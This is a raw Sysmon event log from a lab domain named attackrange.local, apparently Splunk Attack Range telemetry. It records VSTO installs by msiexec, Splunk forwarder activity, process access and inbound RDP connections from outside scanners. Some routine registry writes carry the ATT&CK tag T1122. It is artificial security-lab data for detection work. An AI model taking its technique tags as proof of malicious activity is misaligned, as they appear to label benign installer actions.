14:56:02.001{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\8N40RNSZ\Policy.14.0.Microsoft.Office.Interop.Access.Dao.dll2021-04-20 14:56:02.001 11241100x800000000000000072371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.001{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\VKQFXWU8\Policy.12.0.Microsoft.Office.Interop.Access.Dao.dll2021-04-20 14:56:02.001 354300x800000000000000049955Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.808{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52506-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049954Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:00.504{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61547-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049953Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:02.982{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BB961E4DB8F17AA55A565ECCBB7F44F,SHA256=4977372778113B0D9991DCD41FED682BE4AC76E31D5C17A0A9A39C0A83203163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049952Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:02.607{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF344CA42491CAA2C1B4EDC51CDB4E35,SHA256=5169FF327117FAEB0D8A6EA287F98B2464B654022999437D928C53AD51EBCE90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB83-607E-A00B-00000000BB01}5128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB83-607E-A00B-00000000BB01}5128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB83-607E-A00B-00000000BB01}5128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.237{A7A01FEF-EB83-607E-A00B-00000000BB01}5128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:03.235{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=329FE40BC11D8DA2179E8D1723ED53A4,SHA256=C8B113AACECE0634F3D8C8EA4CBED405498B6A282B8AC878E251E24F9D92E1AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049956Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:03.638{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B183E7681A118EC6CC473B642A1B9F,SHA256=85B3209732D24ADABFD05AE64AA2E78B9DBD8978AA6A1824C396B7CEEFD99E9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.943{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-11024-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000072549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.407{A7A01FEF-EB84-607E-A10B-00000000BB01}61645660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB84-607E-A10B-00000000BB01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB84-607E-A10B-00000000BB01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB84-607E-A10B-00000000BB01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.252{A7A01FEF-EB84-607E-A10B-00000000BB01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.250{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65CAE299CF4A2580299D3C32843CC14C,SHA256=696E040D522CB69A8ADE890B1EDC8144E4D8F0C58F73FCAD27132A23A01858BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049959Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:04.638{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FADCD14B1A2F980ECC8270D6597AEE,SHA256=D6B2A05ACBFA23DB361C81D7AF92E08B003EE86A832A15F7987E13C793BFF359,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049958Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:02.092{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63017-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049957Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:01.812{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com65052-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 13241300x800000000000000072573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:05.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\VSTO 4.0\TypesSupportedDWORD (0x00000001) 13241300x800000000000000072572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:05.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\VSTO 4.0\EventMessageFilec:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll 13241300x800000000000000072571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:56:05.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\vstoee.dll\UseURLDWORD (0x00000001) 354300x800000000000000072570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.251{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9659-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:04.099{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com52367-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000072568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{F09D237B-3FD1-4900-BEF2-3471CA68142D}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{A249E9F6-5B28-4ED1-8AF0-C9B9C5195486}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{760681E7-B985-41CE-BCBE-2985A1DFC61C}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll 13241300x800000000000000072564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{A37BBB42-E8C1-4E09-B9CA-F009CE620C08}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{274C2936-A842-45f3-A457-FB4BA4ED1BA2}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{99E0D1EC-0A0D-4E50-B8A1-82A8B6ECE5CB}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{3133A7FE-BC5F-4D81-BF02-184ECC88D66E}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{4E3C66D5-58D4-491E-A7D4-64AF99AF6E8B}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 13241300x800000000000000072559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:56:05.657{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKCR\WOW6432Node\CLSID\{99D651D7-5F7C-470E-8A3B-774D5D9536AC}\InprocServer32\(Default)c:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll 